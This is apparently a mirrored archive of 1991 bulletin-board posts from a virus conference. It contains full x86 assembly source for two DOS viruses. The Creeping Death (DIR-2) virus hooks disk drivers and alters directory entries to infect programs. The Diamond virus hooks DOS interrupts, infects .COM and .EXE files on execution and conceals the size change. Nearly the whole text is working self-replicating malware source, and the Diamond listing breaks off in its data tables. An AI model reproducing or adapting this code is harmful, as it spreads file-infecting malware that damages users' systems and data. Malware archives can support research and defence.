mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
1993 lines
59 KiB
NASM
1993 lines
59 KiB
NASM
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (19:52) Number: 3544
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIR-2 Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
; Creeping Death V 1.0
|
|||
|
;
|
|||
|
; (C) Copyright 1991 by VirusSoft Corp.
|
|||
|
|
|||
|
i13org = 5f8h
|
|||
|
i21org = 5fch
|
|||
|
|
|||
|
org 100h
|
|||
|
|
|||
|
mov sp,600h
|
|||
|
inc counter
|
|||
|
xor cx,cx
|
|||
|
mov ds,cx
|
|||
|
lds ax,[0c1h]
|
|||
|
add ax,21h
|
|||
|
push ds
|
|||
|
push ax
|
|||
|
mov ah,30h
|
|||
|
call jump
|
|||
|
cmp al,4
|
|||
|
sbb si,si
|
|||
|
mov drive+2,byte ptr -1
|
|||
|
mov bx,60h
|
|||
|
mov ah,4ah
|
|||
|
call jump
|
|||
|
|
|||
|
mov ah,52h
|
|||
|
call jump
|
|||
|
push es:[bx-2]
|
|||
|
lds bx,es:[bx]
|
|||
|
|
|||
|
search: mov ax,[bx+si+15h]
|
|||
|
cmp ax,70h
|
|||
|
jne next
|
|||
|
xchg ax,cx
|
|||
|
mov [bx+si+18h],byte ptr -1
|
|||
|
mov di,[bx+si+13h]
|
|||
|
mov [bx+si+13h],offset header
|
|||
|
mov [bx+si+15h],cs
|
|||
|
next: lds bx,[bx+si+19h]
|
|||
|
cmp bx,-1
|
|||
|
jne search
|
|||
|
jcxz install
|
|||
|
|
|||
|
pop ds
|
|||
|
mov ax,ds
|
|||
|
add ax,[3]
|
|||
|
inc ax
|
|||
|
mov dx,cs
|
|||
|
dec dx
|
|||
|
cmp ax,dx
|
|||
|
jne no_boot
|
|||
|
add [3],61h
|
|||
|
no_boot: mov ds,dx
|
|||
|
mov [1],8
|
|||
|
|
|||
|
mov ds,cx
|
|||
|
les ax,[di+6]
|
|||
|
mov cs:str_block,ax
|
|||
|
mov cs:int_block,es
|
|||
|
|
|||
|
cld
|
|||
|
mov si,1
|
|||
|
scan: dec si
|
|||
|
lodsw
|
|||
|
cmp ax,1effh
|
|||
|
jne scan
|
|||
|
mov ax,2cah
|
|||
|
cmp [si+4],ax
|
|||
|
je right
|
|||
|
cmp [si+5],ax
|
|||
|
jne scan
|
|||
|
right: lodsw
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov di,offset modify+1
|
|||
|
stosw
|
|||
|
xchg ax,si
|
|||
|
mov di,offset i13org
|
|||
|
cli
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
|
|||
|
mov dx,0c000h
|
|||
|
fdsk1: mov ds,dx
|
|||
|
xor si,si
|
|||
|
lodsw
|
|||
|
cmp ax,0aa55h
|
|||
|
jne fdsk4
|
|||
|
cbw
|
|||
|
lodsb
|
|||
|
mov cl,9
|
|||
|
sal ax,cl
|
|||
|
fdsk2: cmp [si],6c7h
|
|||
|
jne fdsk3
|
|||
|
cmp [si+2],4ch
|
|||
|
jne fdsk3
|
|||
|
push dx
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (19:52) Number: 3545
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIR-2 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
push [si+4]
|
|||
|
jmp short death
|
|||
|
install: int 20h
|
|||
|
file: db "c:",255,0
|
|||
|
fdsk3: inc si
|
|||
|
cmp si,ax
|
|||
|
jb fdsk2
|
|||
|
fdsk4: inc dx
|
|||
|
cmp dh,0f0h
|
|||
|
jb fdsk1
|
|||
|
|
|||
|
sub sp,4
|
|||
|
death: push cs
|
|||
|
pop ds
|
|||
|
mov bx,[2ch]
|
|||
|
mov es,bx
|
|||
|
mov ah,49h
|
|||
|
call jump
|
|||
|
xor ax,ax
|
|||
|
test bx,bx
|
|||
|
jz boot
|
|||
|
mov di,1
|
|||
|
seek: dec di
|
|||
|
scasw
|
|||
|
jne seek
|
|||
|
lea si,[di+2]
|
|||
|
jmp short exec
|
|||
|
boot: mov es,[16h]
|
|||
|
mov bx,es:[16h]
|
|||
|
dec bx
|
|||
|
xor si,si
|
|||
|
exec: push bx
|
|||
|
mov bx,offset param
|
|||
|
mov [bx+4],cs
|
|||
|
mov [bx+8],cs
|
|||
|
mov [bx+12],cs
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
|
|||
|
mov di,offset f_name
|
|||
|
push di
|
|||
|
mov cx,40
|
|||
|
rep movsw
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,3dh
|
|||
|
mov dx,offset file
|
|||
|
call jump
|
|||
|
pop dx
|
|||
|
|
|||
|
mov ax,4b00h
|
|||
|
call jump
|
|||
|
mov ah,4dh
|
|||
|
call jump
|
|||
|
mov ah,4ch
|
|||
|
|
|||
|
jump: pushf
|
|||
|
call dword ptr cs:[i21org]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;--------Installation complete
|
|||
|
|
|||
|
i13pr: mov ah,3
|
|||
|
jmp dword ptr cs:[i13org]
|
|||
|
|
|||
|
|
|||
|
main: push ax ; driver
|
|||
|
push cx ; strategy block
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push si
|
|||
|
push di
|
|||
|
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov al,[bx+2]
|
|||
|
|
|||
|
cmp al,4 ; Input
|
|||
|
je input
|
|||
|
cmp al,8
|
|||
|
je output
|
|||
|
cmp al,9
|
|||
|
je output
|
|||
|
|
|||
|
call in
|
|||
|
cmp al,2 ; Build BPB
|
|||
|
jne ppp ;
|
|||
|
lds si,[bx+12h]
|
|||
|
mov di,offset bpb_buf
|
|||
|
mov es:[bx+12h],di
|
|||
|
mov es:[bx+14h],cs
|
|||
|
push es
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (19:52) Number: 3546
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIR-2 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
mov cx,16
|
|||
|
rep movsw
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov al,[di+2-32]
|
|||
|
cmp al,2
|
|||
|
adc al,0
|
|||
|
cbw
|
|||
|
cmp [di+8-32],0
|
|||
|
je m32
|
|||
|
sub [di+8-32],ax
|
|||
|
jmp short ppp
|
|||
|
m32: sub [di+15h-32],ax
|
|||
|
sbb [di+17h-32],0
|
|||
|
|
|||
|
ppp: pop di
|
|||
|
pop si
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
rts: retf
|
|||
|
|
|||
|
output: mov cx,0ff09h
|
|||
|
call check
|
|||
|
jz inf_sec
|
|||
|
call in
|
|||
|
jmp short inf_dsk
|
|||
|
|
|||
|
inf_sec: jmp _inf_sec
|
|||
|
read: jmp _read
|
|||
|
read_: add sp,16
|
|||
|
jmp short ppp
|
|||
|
|
|||
|
input: call check
|
|||
|
jz read
|
|||
|
inf_dsk: mov byte ptr [bx+2],4
|
|||
|
cld
|
|||
|
lea si,[bx+0eh]
|
|||
|
mov cx,8
|
|||
|
save: lodsw
|
|||
|
push ax
|
|||
|
loop save
|
|||
|
mov [bx+14h],1
|
|||
|
call driver
|
|||
|
jnz read_
|
|||
|
mov byte ptr [bx+2],2
|
|||
|
call in
|
|||
|
lds si,[bx+12h]
|
|||
|
mov ax,[si+6]
|
|||
|
add ax,15
|
|||
|
mov cl,4
|
|||
|
shr ax,cl
|
|||
|
mov di,[si+0bh]
|
|||
|
add di,di
|
|||
|
stc
|
|||
|
adc di,ax
|
|||
|
push di
|
|||
|
cwd
|
|||
|
mov ax,[si+8]
|
|||
|
test ax,ax
|
|||
|
jnz more
|
|||
|
mov ax,[si+15h]
|
|||
|
mov dx,[si+17h]
|
|||
|
more: xor cx,cx
|
|||
|
sub ax,di
|
|||
|
sbb dx,cx
|
|||
|
mov cl,[si+2]
|
|||
|
div cx
|
|||
|
cmp cl,2
|
|||
|
sbb ax,-1
|
|||
|
push ax
|
|||
|
call convert
|
|||
|
mov byte ptr es:[bx+2],4
|
|||
|
mov es:[bx+14h],ax
|
|||
|
call driver
|
|||
|
again: lds si,es:[bx+0eh]
|
|||
|
add si,dx
|
|||
|
sub dh,cl
|
|||
|
adc dx,ax
|
|||
|
mov cs:gad+1,dx
|
|||
|
cmp cl,1
|
|||
|
je small
|
|||
|
mov ax,[si]
|
|||
|
and ax,di
|
|||
|
cmp ax,0fff7h
|
|||
|
je bad
|
|||
|
cmp ax,0ff7h
|
|||
|
je bad
|
|||
|
cmp ax,0ff70h
|
|||
|
jne ok
|
|||
|
bad: pop ax
|
|||
|
dec ax
|
|||
|
push ax
|
|||
|
call convert
|
|||
|
jmp short again
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (19:52) Number: 3547
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIR-2 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
small: not di
|
|||
|
and [si],di
|
|||
|
pop ax
|
|||
|
push ax
|
|||
|
inc ax
|
|||
|
push ax
|
|||
|
mov dx,0fh
|
|||
|
test di,dx
|
|||
|
jz here
|
|||
|
inc dx
|
|||
|
mul dx
|
|||
|
here: or [si],ax
|
|||
|
pop ax
|
|||
|
call convert
|
|||
|
mov si,es:[bx+0eh]
|
|||
|
add si,dx
|
|||
|
mov ax,[si]
|
|||
|
and ax,di
|
|||
|
ok: mov dx,di
|
|||
|
dec dx
|
|||
|
and dx,di
|
|||
|
not di
|
|||
|
and [si],di
|
|||
|
or [si],dx
|
|||
|
|
|||
|
cmp ax,dx
|
|||
|
pop ax
|
|||
|
pop di
|
|||
|
mov cs:pointer+1,ax
|
|||
|
je _read_
|
|||
|
mov dx,[si]
|
|||
|
push ds
|
|||
|
push si
|
|||
|
call write
|
|||
|
pop si
|
|||
|
pop ds
|
|||
|
jnz _read_
|
|||
|
call driver
|
|||
|
cmp [si],dx
|
|||
|
jne _read_
|
|||
|
dec ax
|
|||
|
dec ax
|
|||
|
mul cx
|
|||
|
add ax,di
|
|||
|
adc dx,0
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov [bx+12h],2
|
|||
|
mov [bx+14h],ax
|
|||
|
test dx,dx
|
|||
|
jz less
|
|||
|
mov [bx+14h],-1
|
|||
|
mov [bx+1ah],ax
|
|||
|
mov [bx+1ch],dx
|
|||
|
less: mov [bx+10h],cs
|
|||
|
mov [bx+0eh],100h
|
|||
|
call write
|
|||
|
|
|||
|
_read_: std
|
|||
|
lea di,[bx+1ch]
|
|||
|
mov cx,8
|
|||
|
load: pop ax
|
|||
|
stosw
|
|||
|
loop load
|
|||
|
_read: call in
|
|||
|
|
|||
|
mov cx,9
|
|||
|
_inf_sec:
|
|||
|
mov di,es:[bx+12h]
|
|||
|
lds si,es:[bx+0eh]
|
|||
|
sal di,cl
|
|||
|
xor cl,cl
|
|||
|
add di,si
|
|||
|
xor dl,dl
|
|||
|
push ds
|
|||
|
push si
|
|||
|
call find
|
|||
|
jcxz no_inf
|
|||
|
call write
|
|||
|
and es:[bx+4],byte ptr 07fh
|
|||
|
no_inf: pop si
|
|||
|
pop ds
|
|||
|
inc dx
|
|||
|
call find
|
|||
|
jmp ppp
|
|||
|
|
|||
|
;--------Subroutines
|
|||
|
|
|||
|
find: mov ax,[si+8]
|
|||
|
cmp ax,"XE"
|
|||
|
jne com
|
|||
|
cmp [si+10],al
|
|||
|
je found
|
|||
|
com: cmp ax,"OC"
|
|||
|
jne go_on
|
|||
|
cmp byte ptr [si+10],"M"
|
|||
|
jne go_on
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (19:52) Number: 3548
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIR-2 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
found: test [si+1eh],0ffc0h ; >4MB
|
|||
|
jnz go_on
|
|||
|
test [si+1dh],03ff8h ; <2048B
|
|||
|
jz go_on
|
|||
|
test [si+0bh],byte ptr 1ch
|
|||
|
jnz go_on
|
|||
|
test dl,dl
|
|||
|
jnz rest
|
|||
|
pointer: mov ax,1234h
|
|||
|
cmp ax,[si+1ah]
|
|||
|
je go_on
|
|||
|
xchg ax,[si+1ah]
|
|||
|
gad: xor ax,1234h
|
|||
|
mov [si+14h],ax
|
|||
|
loop go_on
|
|||
|
rest: xor ax,ax
|
|||
|
xchg ax,[si+14h]
|
|||
|
xor ax,cs:gad+1
|
|||
|
mov [si+1ah],ax
|
|||
|
go_on: ;rol cs:gad+1,1
|
|||
|
db 2eh,0d1h,6
|
|||
|
dw offset gad+1
|
|||
|
add si,32
|
|||
|
cmp di,si
|
|||
|
jne find
|
|||
|
ret
|
|||
|
|
|||
|
check: mov ah,[bx+1]
|
|||
|
drive: cmp ah,-1
|
|||
|
mov cs:[drive+2],ah
|
|||
|
jne changed
|
|||
|
push [bx+0eh]
|
|||
|
mov byte ptr [bx+2],1
|
|||
|
call in
|
|||
|
cmp byte ptr [bx+0eh],1
|
|||
|
pop [bx+0eh]
|
|||
|
mov [bx+2],al
|
|||
|
changed: ret
|
|||
|
|
|||
|
write: cmp byte ptr es:[bx+2],8
|
|||
|
jae in
|
|||
|
mov byte ptr es:[bx+2],4
|
|||
|
mov si,70h
|
|||
|
mov ds,si
|
|||
|
modify: mov si,1234h
|
|||
|
push [si]
|
|||
|
push [si+2]
|
|||
|
mov [si],offset i13pr
|
|||
|
mov [si+2],cs
|
|||
|
call in
|
|||
|
pop [si+2]
|
|||
|
pop [si]
|
|||
|
ret
|
|||
|
|
|||
|
driver: mov es:[bx+12h],1
|
|||
|
in:
|
|||
|
db 09ah
|
|||
|
str_block:
|
|||
|
dw ?,70h
|
|||
|
db 09ah
|
|||
|
int_block:
|
|||
|
dw ?,70h
|
|||
|
test es:[bx+4],byte ptr 80h
|
|||
|
ret
|
|||
|
|
|||
|
convert: cmp ax,0ff0h
|
|||
|
jae fat_16
|
|||
|
mov si,3
|
|||
|
xor cs:[si+gad-1],si
|
|||
|
mul si
|
|||
|
shr ax,1
|
|||
|
mov di,0fffh
|
|||
|
jnc cont
|
|||
|
mov di,0fff0h
|
|||
|
jmp short cont
|
|||
|
fat_16: mov si,2
|
|||
|
mul si
|
|||
|
mov di,0ffffh
|
|||
|
cont: mov si,512
|
|||
|
div si
|
|||
|
header: inc ax
|
|||
|
ret
|
|||
|
|
|||
|
counter: dw 0
|
|||
|
|
|||
|
dw 842h
|
|||
|
dw offset main
|
|||
|
dw offset rts
|
|||
|
db 7fh
|
|||
|
|
|||
|
param: dw 0,80h,?,5ch,?,6ch,?
|
|||
|
|
|||
|
bpb_buf: db 32 dup(?)
|
|||
|
f_name: db 80 dup(?)
|
|||
|
|
|||
|
;--------The End.
|
|||
|
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (19:52) Number: 3549
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIR-2 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
|
|||
|
---
|
|||
|
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:00) Number: 3550
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIAMOND Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
; The Diamond Virus
|
|||
|
;
|
|||
|
; Version 2.10
|
|||
|
;
|
|||
|
; also known as:
|
|||
|
; V1024, V651, The EGN Virus
|
|||
|
;
|
|||
|
; Basic release: 5-Aug-1989
|
|||
|
; Last patch: 5-May-1990
|
|||
|
;
|
|||
|
; COPYRIGHT:
|
|||
|
;
|
|||
|
; This program is (c) Copyright 1989,1990 Damage, Inc.
|
|||
|
; Permission is granted to distribute this source provided the tittle
|
|||
|
page is
|
|||
|
; preserved.
|
|||
|
; Any fee can be charged for distribution of this source, however,
|
|||
|
Damage, Inc.
|
|||
|
; distributes it freely.
|
|||
|
; You are specially prohibited to use this program for military
|
|||
|
purposes.
|
|||
|
; Damage, Inc. is not liable for any kind of damages resulting from
|
|||
|
the use of
|
|||
|
; or the inability to use this software.
|
|||
|
;
|
|||
|
; To assemble this program use Turbo Assembler 1.0
|
|||
|
|
|||
|
.radix 16
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
code_len = top_code-main_entry
|
|||
|
data_len = top_data-top_code
|
|||
|
main_entry:
|
|||
|
call locate_address
|
|||
|
gen_count dw 0
|
|||
|
locate_address:
|
|||
|
xchg ax,bp
|
|||
|
cld
|
|||
|
pop bx
|
|||
|
inc word ptr cs:[bx]
|
|||
|
mov ax,0d5aa
|
|||
|
int 21
|
|||
|
cmp ax,2a03
|
|||
|
jz all_done
|
|||
|
mov ax,sp
|
|||
|
inc ax
|
|||
|
mov cl,4
|
|||
|
shr ax,cl
|
|||
|
inc ax
|
|||
|
mov dx,ss
|
|||
|
add ax,dx
|
|||
|
mov dx,ds
|
|||
|
dec dx
|
|||
|
mov es,dx
|
|||
|
xor di,di
|
|||
|
mov cx,(top_data-main_entry-1)/10+1
|
|||
|
mov dx,[di+2]
|
|||
|
sub dx,cx
|
|||
|
cmp dx,ax
|
|||
|
jc all_done
|
|||
|
cli
|
|||
|
sub es:[di+3],cx
|
|||
|
mov [di+2],dx
|
|||
|
mov es,dx
|
|||
|
lea si,[bx+main_entry-gen_count]
|
|||
|
mov cx,top_code-main_entry
|
|||
|
rep
|
|||
|
db 2e
|
|||
|
movsb
|
|||
|
push ds
|
|||
|
mov ds,cx
|
|||
|
mov si,20
|
|||
|
lea di,[di+old_vector-top_code]
|
|||
|
org $-1
|
|||
|
mov ax,offset dos_handler
|
|||
|
xchg ax,[si+64]
|
|||
|
stosw
|
|||
|
mov ax,es
|
|||
|
xchg ax,[si+66]
|
|||
|
stosw
|
|||
|
mov ax,offset time_handler
|
|||
|
xchg ax,[si]
|
|||
|
stosw
|
|||
|
xchg ax,dx
|
|||
|
xchg ax,[si+2]
|
|||
|
stosw
|
|||
|
mov ax,24
|
|||
|
stosw
|
|||
|
pop ds
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
sti
|
|||
|
all_done:
|
|||
|
lea si,[bx+exe_header-gen_count]
|
|||
|
db 2e
|
|||
|
lodsw
|
|||
|
cmp ax,'ZM'
|
|||
|
jz exit_exe
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:00) Number: 3551
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIAMOND <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
mov di,100
|
|||
|
push di
|
|||
|
stosw
|
|||
|
movsb
|
|||
|
xchg ax,bp
|
|||
|
ret
|
|||
|
exit_exe:
|
|||
|
mov dx,ds
|
|||
|
add dx,10
|
|||
|
add cs:[si+return_address+2-exe_header-2],dx
|
|||
|
org $-1
|
|||
|
add dx,cs:[si+stack_offset+2-exe_header-2]
|
|||
|
org $-1
|
|||
|
mov ss,dx
|
|||
|
mov sp,cs:[si+stack_offset-exe_header-2]
|
|||
|
org $-1
|
|||
|
xchg ax,bp
|
|||
|
jmp dword ptr
|
|||
|
cs:[si+return_address-exe_header-2]
|
|||
|
org $-1
|
|||
|
infect:
|
|||
|
mov dx,offset exe_header
|
|||
|
mov cx,top_header-exe_header
|
|||
|
mov ah,3f
|
|||
|
int 21
|
|||
|
jc do_exit
|
|||
|
sub cx,ax
|
|||
|
jnz go_error
|
|||
|
mov di,offset exe_header
|
|||
|
les ax,[di+ss_offset-exe_header]
|
|||
|
org $-1
|
|||
|
mov [di+stack_offset-exe_header],es
|
|||
|
org $-1
|
|||
|
mov [di+stack_offset+2-exe_header],ax
|
|||
|
org $-1
|
|||
|
les ax,[di+ip_offset-exe_header]
|
|||
|
org $-1
|
|||
|
mov [di+return_address-exe_header],ax
|
|||
|
org $-1
|
|||
|
mov [di+return_address+2-exe_header],es
|
|||
|
org $-1
|
|||
|
mov dx,cx
|
|||
|
mov ax,4202
|
|||
|
int 21
|
|||
|
jc do_exit
|
|||
|
mov [di+file_size-exe_header],ax
|
|||
|
org $-1
|
|||
|
mov [di+file_size+2-exe_header],dx
|
|||
|
org $-1
|
|||
|
mov cx,code_len
|
|||
|
cmp ax,cx
|
|||
|
sbb dx,0
|
|||
|
jc do_exit
|
|||
|
xor dx,dx
|
|||
|
mov si,'ZM'
|
|||
|
cmp si,[di]
|
|||
|
jz do_put_image
|
|||
|
cmp [di],'MZ'
|
|||
|
jz do_put_image
|
|||
|
cmp ax,0fe00-code_len
|
|||
|
jc put_image
|
|||
|
go_error:
|
|||
|
stc
|
|||
|
do_exit:
|
|||
|
ret
|
|||
|
do_put_image:
|
|||
|
cmp dx,[di+max_size-exe_header]
|
|||
|
org $-1
|
|||
|
jz go_error
|
|||
|
mov [di],si
|
|||
|
put_image:
|
|||
|
mov ah,40
|
|||
|
int 21
|
|||
|
jc do_exit
|
|||
|
sub cx,ax
|
|||
|
jnz go_error
|
|||
|
mov dx,cx
|
|||
|
mov ax,4200
|
|||
|
int 21
|
|||
|
jc do_exit
|
|||
|
mov ax,[di+file_size-exe_header]
|
|||
|
org $-1
|
|||
|
cmp [di],'ZM'
|
|||
|
jnz com_file
|
|||
|
mov dx,[di+file_size-exe_header+2]
|
|||
|
org $-1
|
|||
|
mov cx,4
|
|||
|
push di
|
|||
|
mov si,[di+header_size-exe_header]
|
|||
|
org $-1
|
|||
|
xor di,di
|
|||
|
shift_size:
|
|||
|
shl si,1
|
|||
|
rcl di,1
|
|||
|
loop shift_size
|
|||
|
sub ax,si
|
|||
|
sbb dx,di
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:00) Number: 3552
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIAMOND <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
pop di
|
|||
|
mov cl,0c
|
|||
|
shl dx,cl
|
|||
|
mov [di+ip_offset-exe_header],ax
|
|||
|
org $-1
|
|||
|
mov [di+cs_offset-exe_header],dx
|
|||
|
org $-1
|
|||
|
add dx,(code_len+data_len+100-1)/10+1
|
|||
|
org $-1
|
|||
|
mov [di+sp_offset-exe_header],ax
|
|||
|
org $-1
|
|||
|
mov [di+ss_offset-exe_header],dx
|
|||
|
org $-1
|
|||
|
add word ptr
|
|||
|
[di+min_size-exe_header],(data_len+100-1)/10+1
|
|||
|
org $-2
|
|||
|
mov ax,[di+min_size-exe_header]
|
|||
|
org $-1
|
|||
|
cmp ax,[di+max_size-exe_header]
|
|||
|
org $-1
|
|||
|
jc adjust_size
|
|||
|
mov [di+max_size-exe_header],ax
|
|||
|
org $-1
|
|||
|
adjust_size:
|
|||
|
mov ax,[di+last_page-exe_header]
|
|||
|
org $-1
|
|||
|
add ax,code_len
|
|||
|
push ax
|
|||
|
and ah,1
|
|||
|
mov [di+last_page-exe_header],ax
|
|||
|
org $-1
|
|||
|
pop ax
|
|||
|
mov cl,9
|
|||
|
shr ax,cl
|
|||
|
add [di+page_count-exe_header],ax
|
|||
|
org $-1
|
|||
|
jmp short put_header
|
|||
|
com_file:
|
|||
|
sub ax,3
|
|||
|
mov byte ptr [di],0e9
|
|||
|
mov [di+1],ax
|
|||
|
put_header:
|
|||
|
mov dx,offset exe_header
|
|||
|
mov cx,top_header-exe_header
|
|||
|
mov ah,40
|
|||
|
int 21
|
|||
|
jc error
|
|||
|
cmp ax,cx
|
|||
|
jz reset
|
|||
|
error:
|
|||
|
stc
|
|||
|
reset:
|
|||
|
ret
|
|||
|
find_file:
|
|||
|
pushf
|
|||
|
push cs
|
|||
|
call calldos
|
|||
|
test al,al
|
|||
|
jnz cant_find
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov ah,51
|
|||
|
int 21
|
|||
|
mov es,bx
|
|||
|
cmp bx,es:[16]
|
|||
|
jnz not_infected
|
|||
|
mov bx,dx
|
|||
|
mov al,[bx]
|
|||
|
push ax
|
|||
|
mov ah,2f
|
|||
|
int 21
|
|||
|
pop ax
|
|||
|
inc al
|
|||
|
jnz fcb_standard
|
|||
|
add bx,7
|
|||
|
fcb_standard:
|
|||
|
mov ax,es:[bx+17]
|
|||
|
and ax,1f
|
|||
|
xor al,1e
|
|||
|
jnz not_infected
|
|||
|
and byte ptr es:[bx+17],0e0
|
|||
|
sub es:[bx+1dh],code_len
|
|||
|
sbb es:[bx+1f],ax
|
|||
|
not_infected:
|
|||
|
pop es
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
cant_find:
|
|||
|
iret
|
|||
|
dos_handler:
|
|||
|
cmp ah,4bh
|
|||
|
jz exec
|
|||
|
cmp ah,11
|
|||
|
jz find_file
|
|||
|
cmp ah,12
|
|||
|
jz find_file
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:00) Number: 3553
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIAMOND <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
cmp ax,0d5aa
|
|||
|
jnz calldos
|
|||
|
not ax
|
|||
|
fail:
|
|||
|
mov al,3
|
|||
|
iret
|
|||
|
exec:
|
|||
|
cmp al,2
|
|||
|
jnc calldos
|
|||
|
push ds
|
|||
|
push es
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
mov ax,3524
|
|||
|
int 21
|
|||
|
push es
|
|||
|
push bx
|
|||
|
mov ah,25
|
|||
|
push ax
|
|||
|
push ds
|
|||
|
push dx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset fail
|
|||
|
int 21
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
mov ax,4300
|
|||
|
int 21
|
|||
|
jc exit
|
|||
|
test cl,1
|
|||
|
jz open
|
|||
|
dec cx
|
|||
|
mov ax,4301
|
|||
|
int 21
|
|||
|
open:
|
|||
|
mov ax,3d02
|
|||
|
int 21
|
|||
|
jc exit
|
|||
|
xchg ax,bx
|
|||
|
mov ax,5700
|
|||
|
int 21
|
|||
|
jc close
|
|||
|
mov al,cl
|
|||
|
or cl,1f
|
|||
|
dec cx
|
|||
|
xor al,cl
|
|||
|
jz close
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
call infect
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
jc close
|
|||
|
mov ax,5701
|
|||
|
int 21
|
|||
|
close:
|
|||
|
mov ah,3e
|
|||
|
int 21
|
|||
|
exit:
|
|||
|
pop ax
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
int 21
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
calldos:
|
|||
|
jmp cs:[old_vector]
|
|||
|
.radix 10
|
|||
|
adrtbl dw
|
|||
|
1680,1838,1840,1842,1996,1998,2000,2002,2004,2154,2156
|
|||
|
dw
|
|||
|
2158,2160,2162,2164,2166,2316,2318,2320,2322,2324,2478
|
|||
|
dw 2480,2482,2640
|
|||
|
diftbl dw
|
|||
|
-324,-322,-156,158,-318,-316,318,156,162,316,164,-322
|
|||
|
dw
|
|||
|
-162,-322,322,322,-324,-158,164,316,-324,324,-316,-164
|
|||
|
dw 324
|
|||
|
valtbl dw
|
|||
|
3332,3076,3076,3076,3588,3588,3588,3588,3588,3844,3844
|
|||
|
dw
|
|||
|
3844,3844,3844,3844,3844,2564,2564,2564,2564,2564,2820
|
|||
|
dw 2820,2820,2308
|
|||
|
